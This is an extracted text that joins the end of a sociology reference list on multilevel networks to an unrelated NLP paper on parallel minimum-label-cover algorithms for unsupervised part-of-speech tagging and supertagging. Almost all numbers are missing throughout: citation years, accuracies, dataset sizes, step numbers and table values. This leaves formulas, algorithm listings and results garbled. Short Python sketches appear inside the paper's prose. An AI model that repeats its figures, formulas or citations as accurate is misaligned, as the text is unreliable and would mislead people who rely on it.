influence on long- term and short-term inter-individual relationships: the case of a trade fair for tv programs distribution in sub-saharan africa. in lazega, e. and snijders, t. a. b. (eds), multi-level network analysis for the social sciences, springer, cham, pp. – . glückler, j., lazega, e. and hammer, i. (eds) . knowledge and networks, vol. springer, cham. connections grossetti, m. . l’espace à trois dimensions des phénomènes sociaux. echelles d’action et d’analyse. sociologies, available at: http://sociologies.revues.org/ index .html huault, i., lazega, e. and richard, ch. . introduction: the discreet regulator. in huault, i. and richard, c. h. (eds), finance: the discreet regulator, palgrave macmillan, london, pp. – . koskinen, j., broccatelli, c., wang, p. and robins, g. . bayesian analysis of erg models for multilevel, multiplex, and multilayered networks with sampled or missing data. in petrucci, a., racioppi, f. and verde, r. (eds), convegno della società italiana di statistica, springer, cham, pp. – . krackhardt, d. . assessing the political landscape: structure, cognition, and power in organizations. admi- nistrative science quarterly : – . lazega, e. . analyse de réseaux et sociologie des organisations. revue française de sociologie : – . lazega, e. . the collegial phenomenon: the so- cial mechanisms of cooperation among peers in a cor- porate law partnership, oxford university press, oxford. lazega, e. a. learning from lobbying: mapping judicial dialogue across national borders among european intellectual property judges. utrecht law review, ( ): – . lazega, e. b. sociologie néo-structurale. in keucheyan et, r. and bronner, g. (eds), introduction à la théorie sociale contemporaine presses universitaires de france, paris, pp. – . lazega, e. . 
appropriateness and structure in organizations: secondary socialization through dynamics of advice networks and weak culture. in brass, d. j., labianca, g. (joe), mehra, a., halgin, d. s. and borgatti, stephen p. (eds), volume on contemporary perspectives on organizational social networks, research in the sociology of organizations, emerald, somerville, ma, pp. – . lazega, e. a. synchronization costs in the organizational society: intermediary relational infrastructures in the dynamics of multilevel networks. in lazega, e. and snijders, t. (eds), multilevel network analysis for the social sciences: theory, methods and applications, springer, dordrecht, pp. – . lazega, e. b. joint ‘anormative’ regulation from status inconsistency: a multilevel spinning top model of specialized institutionalization. in archer, m. s. (ed.), anormative regulation in the morphogenic society, springer, cham, pp. – . lazega, e. . organized mobility and relational turnover as context for social mechanisms: a dynamic invariant at the heart of stability from movement. in glückler, j., lazega, e. and hammer, i. (eds), knowledge and networks, springer, cham, pp. – . lazega, e. . networks and institutionalization: a neo-structural approach. connections : – . lazega, e. . bureaucracy, collegiality and social change: redefining organizations with multilevel relational infrastructures, edward elgar publishers, cheltenham. lazega, e. and mounier, l. . interlocking judges: on joint (exogenous and self) governance of markets. research in the sociology of organizations, : – . lazega, e. and mounier, l. . networks of institutional capture. in vedres, b. and scotti, m. (eds), networks in social policy problems, cambridge university press, cambridge, pp. – . lazega, e. and snijders, t. a. b. (eds) . multilevel network analysis for the social sciences: theory, methods and applications, springer, dordrecht. lazega, e., lemercier, c. and mounier, l. . a spinning top model of formal structure and informal behaviour: dynamics of advice networks in a commercial court. european management review : – . lazega, e., sapulete, s. and mounier, l. . structural stability regardless of membership turnover? the added value of blockmodelling in the analysis of network evolution. quality & quantity : – . lazega, e., jourda, m.-th, mounier, l. and stofer, r. . catching up with the big fish in the big pond? multi-level network analysis through linked design. social networks : – . lazega, e. and jourda, m.-th. . the structural wings of matthew effects: the contribution of three-level network data to the analysis of cumulative advantage. methodological innovation : – . lazega, e., jourda, m.-th. and mounier, l. . network lift from dual alters: extended opportunity structures from a multilevel and structural perspective. european sociological review : – . lazega, e., bar-hen, a., barbillon, p. and donnet, s. . effects of competition on collective learning in advice networks. social networks : – . lazega, e., quintane, e. and casenaz, s. . collegial oligarchy and networks of normative align- ments in transnational institution building. social networks, : – . lindenberg, s. . grounding groups in theory: functional, cognitive, and structural interdepedencies. in markovsky, b. lovaglia, m. j. and troyer, l. (eds), advances in group processes, , jai press, greenwich, ct, pp. – . oubenal, m. . la légitimation des produits financiers, editions ems, paris. parcel, t. l., kaufman, r.l. and leeann, j. . 
going up the ladder: multiplicity sampling to create linked macro-to-micro organizational samples. in marsden, p. (ed.), sociological methodology, basil blackwell, oxford, pp. – . pattison, p. and wasserman, s. . logit models and logistic regressions for social networks: ii. multivariate relations. british journal of mathematical and statistical psychology : – . embarked on social processes in dynamic and multilevel networks penalva-icher, É. . amitié et régulation par les normes. revue française de sociologie : – . perrow, c. . a society of organizations. theory and society : – . pina-stranger, a. and lazega, e. . bringing personalized ties back in: their added value for biotech entrepreneurs and venture capitalists in inter- organizational networks. the sociological quarterly, : – . presthus, r. . the organizational society, knopf, new york, ny. quintane, e., pattison, p. e., robins, g. l. and mol, j. m. . short-and long-term stability in organizational networks: temporal structures of project teams. social networks : – . reynaud, j. -d. . les règles du jeu: l’action collective et la régulation sociale, armand colin, paris. selznick, p. h. . tva and the grass roots: a study in the sociology of formal organizations, university of california press, berkeley, ca. selznick, p. h. . leadership in administration, row, peterson & co, evanston, il. snijders, t. a. b. . stochastic actor-oriented models for network change. journal of mathematical sociology : – . snijders, t. a. b. . models for longitudinal network data. chapter . in carrington, p., scott, j. and wasserman, s. (eds), models and methods in social network analysis, cambridge university press, new york, ny, pp. – . snijders, t. a. b. . the multiple flavours of multilevel issues for networks. in lazega, e. and snijders, t. a. b. (eds), multilevel network analysis: theory, methods and applications, springer, cham, pp. – . snijders, t. a. b. and bosker, r. j. . multilevel analysis: an introduction to basic and advanced multilevel modeling, nd ed., sage publishers, london. snijders, t. a. b. and steglich, c. e. g. (forthcoming). social network dynamics by examples, cambridge university press, cambridge. snijders, t. a. b., pattison, p. e., robins, g. l. and handcock, m. s. . new specifications for exponential random graph models. sociological methodology : – . tilly, c. h. . durable inequality, university of california press, berkeley, ca. tilly, c. h. . changing forms of inequality. sociological theory : – . tranmer, m., pallotti, f. and lomi, a. . the embeddedness of organizational performance: multiple membership multiple classification models for the analysis of multilevel networks. social networks : – . van duijn, m. a., snijders, t. a. and zijlstra, b. j. . p : a random effects model with covariates for directed graphs. statistica neerlandica : – . wang, p., robins, g., pattison, p. and lazega, e. . exponential random graph models for multilevel networks. social networks, : – . wang, p., robins, g., pattison, p. and lazega, e. . social selection models for multilevel networks. social networks, : – . wasserman, s. and iacobucci, d. . statistical modelling of one-mode and two-mode networks: simultaneous analysis of graphs and bipartite graphs. british journal of mathematical and statistical psychology : – . wasserman, s. and robins, g. . an introduction to random graphs, dependence graphs, and p*. models and methods in social network analysis : – . weber, m. . economy and society, edited by g. roth and c. 
wittich, university of california press, berkeley, (first edition ). white, h. c. . chains of opportunity: system models of mobility in organizations, harvard university press, cambridge. white, h. c., boorman, s. c. and breiger, r. l. . social structure from multiple networks. i. blockmodels of roles and positions. american journal of sociology : – . wittek, r. . intra-organizational networks. in alhajj, r. and rokne, j. (eds), encyclopedia of social network analysis and mining, nd ed., springer, new york, ny. wittek, r. and van de bunt, g. g. . post- bureaucratic governance, informal networks and oppositional solidarity in organizations. the netherlands’ journal of social sciences : – . wittek, r. and van witteloostuijn, v. . rational choice and organizational change. in wittek, r., snijders, t. a. and nee, v. (eds), the handbook of rational choice social research, stanford university press, palo alto, ca, pp. – . zappa, p. and lomi, a. . the analysis of multilevel networks in organizations: models and empirical tests. organizational research methods : – . Žiberna, a. . blockmodeling of multilevel networks. social networks : – . Žiberna, a. and lazega, e. . role sets and division of work at two levels of collective agency: the case of blockmodeling a multilevel (inter-individual and inter-organizational) network. in lazega, e. and snijders, t. (eds), multilevel network analysis: theory, methods and applications, springer, dordrecht. ziherl, p., iglic, h. and ferligoj, a. . research groups’ social capital: a clustering approach. metodoloski zvezki : . parallel algorithms for unsupervised tagging sujith ravi google mountain view, ca sravi@google.com sergei vassilivitskii google mountain view, ca sergeiv@google.com vibhor rastogi∗ twitter san francisco, ca vibhor.rastogi@gmail.com abstract we propose a new method for unsupervised tagging that finds minimal models which are then further improved by expectation max- imization training. in contrast to previous approaches that rely on manually specified and multi-step heuristics for model minimiza- tion, our approach is a simple greedy approx- imation algorithm dmlc (distributed- minimum-label-cover) that solves this objective in a single step. we extend the method and show how to ef- ficiently parallelize the algorithm on modern parallel computing platforms while preserving approximation guarantees. the new method easily scales to large data and grammar sizes, overcoming the memory bottleneck in previ- ous approaches. we demonstrate the power of the new algorithm by evaluating on various sequence labeling tasks: part-of-speech tag- ging for multiple languages (including low- resource languages), with complete and in- complete dictionaries, and supertagging, a complex sequence labeling task, where the grammar size alone can grow to millions of entries. our results show that for all of these settings, our method achieves state-of-the-art scalable performance that yields high quality tagging outputs. introduction supervised sequence labeling with large labeled training datasets is considered a solved problem. for ∗∗the research described herein was conducted while the author was working at google. instance, state of the art systems obtain tagging ac- curacies over % for part-of-speech (pos) tagging on the english penn treebank. however, learning accurate taggers without labeled data remains a chal- lenge. 
the accuracies quickly drop when faced with data from a different domain, language, or when there is very little labeled information available for training (banko and moore, ). recently, there has been an increasing amount of research tackling this problem using unsuper- vised methods. a popular approach is to learn from pos-tag dictionaries (merialdo, ), where we are given a raw word sequence and a dictionary of legal tags for each word type. learning from pos- tag dictionaries is still challenging. complete word- tag dictionaries may not always be available for use and in every setting. when they are available, the dictionaries are often noisy, resulting in high tag- ging ambiguity. furthermore, when applying tag- gers in new domains or different datasets, we may encounter new words that are missing from the dic- tionary. there have been some efforts to learn pos taggers from incomplete dictionaries by extending the dictionary to include these words using some heuristics (toutanova and johnson, ) or using other methods such as type-supervision (garrette and baldridge, ). in this work, we tackle the problem of unsuper- vised sequence labeling using tag dictionaries. the first reported work on this problem was on pos tag- ging from merialdo ( ). the approach involved training a standard hidden markov model (hmm) using the expectation maximization (em) algo- rithm (dempster et al., ), though em does not perform well on this task (johnson, ). more re- cent methods have yielded better performance than em (see (ravi and knight, ) for an overview). one interesting line of research introduced by ravi and knight ( ) explores the idea of per- forming model minimization followed by em train- ing to learn taggers. their idea is closely related to the classic minimum description length princi- ple for model selection (barron et al., ). they ( ) formulate an objective function to find the small- est model that explains the text (model minimization step), and then, ( ) fit the minimized model to the data (em step). for pos tagging, this method (ravi and knight, ) yields the best performance to date; . % tagging accuracy on a standard test dataset from the english penn treebank. the orig- inal work from (ravi and knight, ) uses an in- teger linear programming (ilp) formulation to find minimal models, an approach which does not scale to large datasets. ravi et al. ( b) introduced a two-step greedy approximation to the original ob- jective function (called the min-greedy algo- rithm) that runs much faster while maintaining the high tagging performance. garrette and baldridge ( ) showed how to use several heuristics to fur- ther improve this algorithm (for instance, better choice of tag bigrams when breaking ties) and stack other techniques on top, such as careful initialization of hmm emission models which results in further performance gains. their method also works un- der incomplete dictionary scenarios and can be ap- plied to certain low-resource scenarios (garrette and baldridge, ) by combining model minimization with supervised training. in this work, we propose a new scalable algorithm for performing model minimization for this task. by making an assumption on the structure of the solu- tion, we prove that a variant of the greedy set cover algorithm always finds an approximately optimal la- bel set. this is in contrast to previous methods that employ heuristic approaches with no guarantee on the quality of the solution. 
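since the analysis casts model minimization as a variant of greedy set cover, a brief reference sketch of the classic greedy set-cover template may help; this is background only, not the authors' implementation, and the universe elements and set names below are purely illustrative.

```python
# Classic greedy set cover: repeatedly pick the set covering the most
# still-uncovered elements; this template gives the well-known O(log n)
# approximation guarantee referred to above.
def greedy_set_cover(universe, sets):
    """universe: set of elements; sets: dict mapping a set name to a set of elements."""
    uncovered = set(universe)
    chosen = []
    while uncovered:
        # Pick the set with the largest intersection with the uncovered elements.
        best = max(sets, key=lambda name: len(sets[name] & uncovered))
        if not sets[best] & uncovered:
            break  # remaining elements cannot be covered by any set
        chosen.append(best)
        uncovered -= sets[best]
    return chosen

# Illustrative toy instance (names are made up for the example).
universe = {1, 2, 3, 4, 5}
sets = {"A": {1, 2, 3}, "B": {2, 4}, "C": {3, 4}, "D": {4, 5}}
print(greedy_set_cover(universe, sets))  # picks "A" first, then "D"
```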
in addition, we do not have to rely on ad hoc tie-breaking procedures or careful initializations for unknown words. finally, not only is the proposed method approximately op- timal, it is also easy to distribute, allowing it to eas- ily scale to very large datasets. we show empirically that our method, combined with an em training step outperforms existing state of the art systems. . our contributions • we present a new method, distributed minimum label cover, dmlc, for model minimization that uses a fast, greedy algorithm with formal approximation guarantees to the quality of the solution. • we show how to efficiently parallelize the al- gorithm while preserving approximation guar- antees. in contrast, existing minimization ap- proaches cannot match the new distributed al- gorithm when scaling from thousands to mil- lions or even billions of tokens. • we show that our method easily scales to both large data and grammar sizes, and does not re- quire the corpus or label set to fit into memory. this allows us to tackle complex tagging tasks, where the tagset consists of several thousand labels, which results in more than one million entires in the grammar. • we demonstrate the power of the new method by evaluating under several differ- ent scenarios—pos tagging for multiple lan- guages (including low-resource languages), with complete and incomplete dictionaries, as well as a complex sequence labeling task of su- pertagging. our results show that for all these settings, our method achieves state-of-the-art performance yielding high quality taggings. related work recently, there has been an increasing amount of research tackling this problem from multiple di- rections. some efforts have focused on inducing pos tag clusters without any tags (christodoulopou- los et al., ; reichart et al., ; moon et al., ), but evaluating such systems proves dif- ficult since it is not straightforward to map the clus- ter labels onto gold standard tags. a more pop- ular approach is to learn from pos-tag dictionar- ies (merialdo, ; ravi and knight, ), incom- plete dictionaries (hasan and ng, ; garrette and baldridge, ) and human-constructed dictionar- ies (goldberg et al., ). another direction that has been explored in the past includes bootstrapping taggers for a new lan- guage based on information acquired from other lan- guages (das and petrov, ) or limited annota- tion resources (garrette and baldridge, ). ad- ditional work focused on building supervised tag- gers for noisy domains such as twitter (gimpel et al., ). while most of the relevant work in this area centers on pos tagging, there has been some work done for building taggers for more complex sequence labeling tasks such as supertagging (ravi et al., a). other related work include alternative methods for learning sparse models via priors in bayesian in- ference (goldwater and griffiths, ) and poste- rior regularization (ganchev et al., ). but these methods only encourage sparsity and do not explic- itly seek to minimize the model size, which is the ob- jective function used in this work. moreover, taggers learned using model minimization have been shown to produce state-of-the-art results for the problems discussed here. model following ravi and knight ( ), we formulate the problem as that of label selection on the sentence graph. formally, we are given a set of sequences, s = {s ,s , . . . ,sn} where each si is a sequence of words, si = wi ,wi , . . . ,wi,|si|. with each word wij we associate a set of possible tags tij. 
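as a rough illustration of the formulation that follows, the sketch below shows one way the input (sentences with per-token candidate tag sets) and the induced set of labels could be represented; the toy words, tags and function names are assumptions made for the example, not part of the original system.

```python
# Toy representation of the input: each sentence is a list of tokens, and each
# token carries its set of candidate tags (from the tag dictionary).
sentences = [
    ["the", "dog", "barks"],
    ["the", "cat", "barks"],
]
candidate_tags = {
    "the": {"DT"},
    "dog": {"NN", "VB"},
    "cat": {"NN"},
    "barks": {"VB", "NN"},
}

def induced_labels(assignment):
    """Given one chosen tag per token (a list of tag lists parallel to
    `sentences`), return the set of distinct tag bigrams ("labels") used,
    including the boundary bigrams with START and END."""
    labels = set()
    for tags in assignment:
        padded = ["START"] + list(tags) + ["END"]
        for prev, cur in zip(padded, padded[1:]):
            labels.add((prev, cur))
    return labels

# One feasible assignment; the objective counts distinct labels over all sentences.
assignment = [["DT", "NN", "VB"], ["DT", "NN", "VB"]]
print(sorted(induced_labels(assignment)), len(induced_labels(assignment)))
```

under this representation, the minimization problem defined next asks for the assignment, consistent with each token's candidate set, whose number of distinct labels is smallest.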
we will denote by m the total number of (possibly du- plicate) words (tokens) in the corpus. additionally, we define two special words w and w∞ with special tags start and end, and consider the modified sequences s′i = w ,si,w∞. to sim- plify notation, we will refer to w∞ = w|si|+ . the sequence label problem asks us to select a valid tag tij ∈ tij for each word wij in the input to minimize a specific objective function. we will refer to a tag pair (ti,j− , tij) as a label. our aim is to minimize the number of distinct labels used to cover the full input. formally, given a se- quence s′i and a tag tij for each word wij in s ′ i, let the induced set of labels for sequence s′i be li = |s′i|⋃ j= {(ti,j− , tij)}. the total number of distinct labels used over all se- quences is then φ = ∣∣∪i li| = ∣∣⋃ i |si|+ ⋃ j= {(ti,j− , tij)}|. note that the order of the tokens in the label makes a difference as {(nn, vp)} and {(vp, nn)} are two distinct labels. now we can define the problem formally, follow- ing (ravi and knight, ). problem (minimum label cover). given a set s of sequences of words, where each word wij has a set of valid tags tij, the problem is to find a valid tag assignment tij ∈ tij for each word that minimizes the number of distinct labels or tag pairs over all sequences, φ = ∣∣⋃ i ⋃|si|+ j= {(ti,j− , tij)}| . the problem is closely related to the classical set cover problem and is also np-complete. to reduce set cover to the label selection problem, map each element i of the set cover instance to a single word sentence si = wi , and let the valid tags ti con- tain the names of the sets that contain element i. consider a solution to the label selection problem; every sentence si is covered by two labels (w ,ki) and (ki,w∞), for some ki ∈ ti , which corresponds to an element i being covered by set ki in the set cover instance. thus any valid solution to the label selection problem leads to a feasible solution to the set cover problem ({k ,k , . . .}) of exactly half the size. finally, we will use {{. . .}} notation to denote a multiset of elements, i.e. a set where an element may appear multiple times. algorithm in this section, we describe the distributed- minimum-label-cover, dmlc, algorithm for approximately solving the minimum label cover problem. we describe the algorithm in a central- ized setting, and defer the distributed implementa- tion to section . before describing the algorithm, we briefly explain the relationship of the minimum label cover problem to set cover. . modification of set cover as we pointed out earlier, the minimum label cover problem is at least as hard as the set cover prob- : input: a set of sequences s with each words wij having possible tags tij. : output: a tag assignment tij ∈ tij for each word wij approximately minimizing labels. : let m be the multi set of all possible labels generated by choosing each possible tag t ∈ tij. m = ⋃ i   |si|+ ⋃ j= ⋃ t′∈ti,j− t∈tij {{(t′, t)}}   ( ) : let l = ∅ be the set of selected labels. : repeat : select the most frequent label not yet se- lected: (t′, t) = arg max(s′,s)/∈l |m ∩ (s′,s)|. : for each bigram (wi,j− ,wij) where t′ ∈ ti,j− and t ∈ tij tentatively assign t′ to wi,j− and t to wij. add (t′, t) to l. : if a word gets two assignments, select one at random with equal probability. : if a bigram (wij,wi,j+ ) is consistent with assignments in (t,t′), fix the tenta- tive assignments, and set ti,j− = {t′} and tij = t. recompute m, the multi- set of possible labels, with the updated ti,j− and tij. 
: until there are no unassigned words algorithm : mlc algorithm : input: a set of sequences s with each words wij having possible tags tij. : output: a tag assignment tij ∈ tij for each word wij approximately minimizing labels. : (graph creation) initialize each vertex vij with the set of possible tags tij and its neighbors vi,j+ and vi,j− . : repeat : (message passing) each vertex vij sends its pos- sibly tags tij to its forward neighbor vij+ . : (counter update) each vertex receives the the tags ti,j− and adds all possible labels {(s,s′)|s ∈ ti,j− ,s′ ∈ tij} to a global counter (m). : (maxlabel selection) each vertex queries the global counter m to find the maximum label (t,t′). : (tentative assignment) each vertex vij selects a tag tentatively as follows: if one of the tags t,t′ is in the feasible set tij, it tentatively selects the tag. : (random assignment) if both are feasible it se- lects one at random. the vertex communicates its assignment to its neighbors. : (confirmed assignment) each vertex receives the tentative assignment from its neighbors. if together with its neighbors it can match the se- lected label, the assignment is finalized. if the assigned tag is t , then the vertex vij sets the valid tag set tij to {t}. : until no unassigned vertices exist. algorithm : dmlc implementation lem. an additional challenge comes from the fact that labels are tags for a pair of words, and hence are related. for example, if we label a word pair (wi,j− ,wij) as (nn, vp), then the label for the next word pair (wij,wi,j+ ) has to be of the form (vp, *), i.e., it has to start with vp. previous work (ravi et al., a; ravi et al., b) recognized this challenge and employed two phase heuristic approaches. eschewing heuristics, we will show that with one natural assumption, even with this extra set of constraints, the standard greedy algorithm for this problem results in a solution with a provable approximation ratio of o(log m). in practice, however, the algorithm performs far better than the worst case ratio, and similar to the work of (gomes et al., ), we find that the greedy approach selects a cover approximately % worse than the optimum solution. . mlc algorithm we present in algorithm our minimum label cover algorithm to approximately solve the mini- mum label cover problem. the algorithm is simple, efficient, and easy to distribute. the algorithm chooses labels one at a time, select- ing a label that covers as many words as possible in every iteration. for this, it generates and maintains a multi-set of all possible labels m (step ). the multi-set contains an occurrence of each valid label, for example, if wi,j− has two possible valid tags nn and vp, and wij has one possible valid tag vp, then m will contain two labels, namely (nn, vp) and (vp, vp). since m is a multi-set it will contain duplicates, e.g. the label (nn, vp) will appear for each adjacent pair of words that have nn and vp as valid tags, respectively. in each iteration, the algorithm picks a label with the most number of occurrences in m and adds it to the set of chosen labels (step ). intuitively, this is a greedy step to select a label that covers the most number of word pairs. once the algorithm picks a label (t′, t), it tries to assign as many words to tags t or t′ as possible (step ). a word can be assigned t′ if t′ is a valid tag for it, and t a valid tag for the next word in sequence. similarly, a word can be assigned t, if t is a valid tag for it, and t′ a valid tag for the previous word. 
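as a hedged sketch of the counting and greedy-selection steps just described (the random tie-breaking and confirmation steps are covered in the text that follows), one could compute the most frequent feasible label as below; all names are illustrative and this is not the authors' code.

```python
from collections import Counter

def most_frequent_label(sentences, candidate_tags):
    """Build the multiset M of feasible tag bigrams over adjacent positions
    (including the START/END boundaries) and return the currently most
    frequent one, mirroring the greedy selection step described above."""
    m = Counter()
    for sent in sentences:
        prev_tags = {"START"}
        for word in list(sent) + [None]:  # None marks the end-of-sentence slot
            cur_tags = {"END"} if word is None else candidate_tags[word]
            for t_prev in prev_tags:
                for t_cur in cur_tags:
                    m[(t_prev, t_cur)] += 1
            prev_tags = cur_tags
    return m.most_common(1)[0]  # ((t_prev, t_cur), count)

# With the toy `sentences` and `candidate_tags` sketched earlier:
#   label, count = most_frequent_label(sentences, candidate_tags)
# The surrounding text then describes how that label is tentatively assigned,
# how conflicts are resolved at random, and how M is recomputed once the
# affected candidate sets shrink to singletons.
```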
some words can get both assignments, in which case we choose one tentatively at random (step ). if a word’s tentative random tag, say t, is consistent with the choices of its adjacent words (say t′ from the previous word), then the tentative choice is fixed as a permanent one. whenever a tag is selected, the set of valid tags tij for the word is reduced to a sin- gleton {t}. once the set of valid tags tij changes, the multi-set m of all possible labels also changes, as seen from eq . the multi-set is then recom- puted (step ) and the iterations repeated until all of words have been tagged. we can show that under a natural assumption this simple algorithm is approximately optimal. assumption (c-feasibility). let c ≥ be any num- ber, and k be the size of the optimal solution to the original problem. in each iteration, the mlc algo- rithm fixes the tags for some words. we say that the algorithm is c-feasible, if after each iteration there exists some solution to the remaining problem, con- sistent with the chosen tags, with size at most ck . the assumption encodes the fact that a single bad greedy choice is not going to destroy the overall structure of the solution, and a nearly optimal so- lution remains. we note that this assumption of c- feasibility is not only sufficient, as we will formally show, but is also necessary. indeed, without any as- sumptions, once the algorithm fixes the tag for some words, an optimal label may no longer be consis- tent with the chosen tags, and it is not hard to find contrived examples where the size of the optimal so- lution doubles after each iteration of mlc. since the underlying problem is np-complete, it is computationally hard to give direct evidence ver- ifying the assumption on natural language inputs. however, on small examples we are able to show that the greedy algorithm is within a small constant factor of the optimum, specifically it is within % of the optimum model size for the pos tagging problem using the standard k dataset (ravi and knight, ). combined with the fact that the final method outperforms state of the art approaches, this leads us to conclude that the structural assumption is well justified. lemma . under the assumption of c-feasibility, the mlc algorithm achieves a o(c log m) approx- imation to the minimum label cover problem, where m = ∑ i |si| is the total number of tokens. proof. to prove the lemma we will define an objec- tive function φ̄, counting the number of unlabeled word pairs, as a function of possible labels, and show that φ̄ decreases by a factor of ( −o( /ck)) at every iteration. to define φ̄, we first define φ, the number of la- beled word pairs. consider a particular set of la- bels, l = {l ,l , . . . ,lk} where each label is a pair (ti, tj). call {tij} a valid assignment of to- kens if for each wij, we have tij ∈ tij. then the score of l under an assignment t, which we denote by φt, is the number of bigram labels that appear in l. formally, φt(l) = | ∪i,j {{(ti,j− , tij) ∩l}}|. finally, we define φ(l) to be the best such assign- ment, φ(l) = maxt φt(l), and φ̄(l) = m−φ(l) the number of uncovered labels. consider the label selected by the algorithm in ev- ery step. by the c-feasibility assumption, there ex- ists some solution having ck labels. thus, some la- bel from that solution covers at least a /ck fraction of the remaining words. the selected label (t,t′) maximizes the intersection with the remaining fea- sible labels. 
the conflict resolution step ensures that in expectation the realized benefit is at least a half of the maximum, thereby reducing φ̄ by at least a ( − / ck) fraction. therefore, after o(kc log m) operations all of the labels are covered. . fitting the model using em once the greedy algorithm terminates and returns a minimized grammar of tag bigrams, we follow the approach of ravi and knight ( ) and fit the min- imized model to the data using the alternating em strategy. in this step, we run an alternating optimization procedure iteratively in phases. in each phase, we initialize (and prune away) parameters within the two hmm components (transition or emission model) using the output from the previous phase. we initialize this procedure by restricting the tran- sition parameters to only those tag bigrams selected in the model minimization step. we train in con- junction with the original emission model using em algorithm which prunes away some of the emission parameters. in the next phase, we alternate the ini- tialization by choosing the pruned emission model along with the original transition model (with full set of tag bigrams) and retrain using em. the alter- nating em iterations are terminated when the change in the size of the observed grammar (i.e., the number of unique bigrams in the tagging output) is ≤ %. we refer to our entire approach using greedy mini- mization followed by em training as dmlc + em. distributed implementation the dmlc algorithm is directly suited towards parallelization across many machines. we turn to pregel (malewicz et al., ), and its open source version giraph (apa, ). in these systems the computation proceeds in rounds. in every round, ev- ery machine does some local processing and then sends arbitrary messages to other machines. se- mantically, we think of the communication graph as fixed, and in each round each vertex performs some local computation and then sends messages to its neighbors. this mode of parallel programming di- rects the programmers to “think like a vertex.” the specific systems like pregel and giraph build infrastructure that ensures that the overall system for more details on the alternating em strategy and how initialization with minimized models improve em performance in alternating iterations, refer to (ravi and knight, ). is fault tolerant, efficient, and fast. in addition, they provide implementation of commonly used dis- tributed data structures, such as, for example global counters. the programmer’s job is simply to specify the code that each vertex will run at every round. we implemented the dmlc algorithm in pregel. the implementation is straightforward and given in algorithm . the multi-set m of algorithm is represented as a global counter in algorithm . the message passing (step ) and counter update (step ) steps update this global counter and hence per- form the role of step of algorithm . step se- lects the label with largest count, which is equivalent to the greedy label picking step of algorithm . fi- nally steps , , and update the tag assignment of each vertex performing the roles of steps , , and , respectively, of algorithm . . speeding up the algorithm the implementation described above directly copies the sequential algorithm. here we describe addi- tional steps we took to further improve the parallel running times. singleton sets: as the parallel algorithm pro- ceeds, the set of feasible sets associated with a node slowly decreases. 
at some point there is only one tag that a node can take on, however this tag is rare, and so it takes a while for it to be selected using the greedy strategy. nevertheless, if a node and one of its neighbors have only a single tag left, then it is safe to assign the unique label . modifying the graph: as is often the case, the bottleneck in parallel computations is the commu- nication. to reduce the amount of communication we reduce the graph on the fly, removing nodes and edges once they no longer play a role in the compu- tation. this simple modification decreases the com- munication time in later rounds as the total size of the problem shrinks. experiments and results in this section, we describe the experimental setup for various tasks, settings and compare empirical performance of our method against several existing we must judiciously initialize the global counter to take care of this assignment, but this is easily accomplished. baselines. the performance results for all systems (on all tasks) are measured in terms of tagging accu- racy, i.e. % of tokens from the test corpus that were labeled correctly by the system. . part-of-speech tagging task . . tagging using a complete dictionary data: we use a standard test set (consisting of , word tokens from the penn treebank) for the pos tagging task. the tagset consists of dis- tinct tag labels and the dictionary contains , word/tag pairs derived from the entire penn tree- bank. per-token ambiguity for the test data is about . tags/token. in addition to the standard k dataset, we also train and test on larger data sets— k tokens from the penn treebank, m tokens from ptb+europarl (koehn, ) data. methods: we evaluate and compare performance for pos tagging using four different methods that employ the model minimization idea combined with em training: • em: training a bigram hmm model using em algorithm (merialdo, ). • ilp + em: minimizing grammar size using integer linear programming, followed by em training (ravi and knight, ). • min-greedy + em: minimizing grammar size using the two-step greedy method (ravi et al., b). • dmlc + em: this work. results: table shows the results for pos tag- ging on english penn treebank data. on the smaller test datasets, all of the model minimization strate- gies (methods , , ) tend to perform equally well, yielding state-of-the-art results and large improve- ment over standard em. when training (and testing) on larger corpora sizes, dmlc yields the best re- ported performance on this task to date. a major advantage of the new method is that it can easily scale to large corpora sizes and the distributed na- ture of the algorithm still permits fast, efficient op- timization of the global objective function. so, un- like the earlier methods (such as min-greedy) it is fast enough to run on several millions of tokens to yield additional performance gains (shown in last column). speedups: we also observe a significant speedup when using the parallelized version of the dmlc algorithm. performing model minimization on the k tokens dataset takes seconds on a single ma- chine, whereas parallelization permits model mini- mization to be feasible even on large datasets. fig shows the running time for dmlc when run on a cluster of machines. we vary the input data size from m word tokens to about m word tokens, while holding the resources constant. both the algo- rithm and its distributed implementation in dmlc are linear time operations as evident by the plot. 
in fact, for comparison, we also plot a straight line passing through the first two runtimes. the straight line essentially plots runtimes corresponding to a linear speedup. dmlc clearly achieves better run- times showing even better than linear speedup. the reason for this is that distributed version has a con- stant overhead for initialization, independent of the data size. while the running time for rest of the im- plementation is linear in data size. thus, as the data size becomes larger, the constant overhead becomes less significant, and the distributed implementation appears to complete slightly faster as data size in- creases. figure : runtime vs. data size (measured in # of word tokens) on machines. for comparison, we also plot a straight line passing through the first two runtimes. the straight line essentially plots runtimes corresponding to a linear speedup. dmlc clearly achieves better runtimes showing a better than linear speedup. . . tagging using incomplete dictionaries we also evaluate our approach for pos tagging under other resource-constrained scenarios. obtain- method tagging accuracy (%) te= k te= k tr= k tr= k tr= . m . em . . . ilp + em (ravi and knight, ) . . min-greedy + em (ravi et al., b) . . . dmlc + em (this work) . . . table : results for unsupervised part-of-speech tagging on english penn treebank dataset. tagging accuracies for different methods are shown on multiple datasets. te shows the size (number of tokens) in the test data, tr represents the size of the raw text used to perform model minimization. ing a complete dictionary is often difficult, espe- cially for new domains. to verify the utility of our method when the input dictionary is incomplete, we evaluate against standard datasets used in previous work (garrette and baldridge, ) and compare against the previous best reported performance for the same task. in all the experiments (described here and in subsequent sections), we use the fol- lowing terminology—raw data refers to unlabeled text used by different methods (for model minimiza- tion or other unsupervised training procedures such as em), dictionary consists of word/tag entries that are legal, and test refers to data over which tagging evaluation is performed. english data: for english pos tagging with in- complete dictionary, we evaluate on the penn tree- bank (marcus et al., ) data. following (garrette and baldridge, ), we extracted a word-tag dic- tionary from sections - ( , tokens) con- sisting of , word types, , word/tag en- tries, a per-type ambiguity of . yielding a per- token ambiguity of . on the raw corpus (treating unknown words as having all possible tags). as in their setup, we then use the first , tokens of section as raw data and perform final evalua- tion on the sections - . we use the raw corpus along with the unlabeled test data to perform model minimization and em training. unknown words are allowed to have all possible tags in both these pro- cedures. italian data: the minimization strategy pre- sented here is a general-purpose method that does not require any specific tuning and works for other languages as well. to demonstrate this, we also per- form evaluation on a different language (italian) us- ing the tut corpus (bosco et al., ). follow- ing (garrette and baldridge, ), we use the same data splits as their setting. we take the first half of each of the five sections to build the word-tag dic- tionary, the next quarter as raw data and the last quarter as test data. 
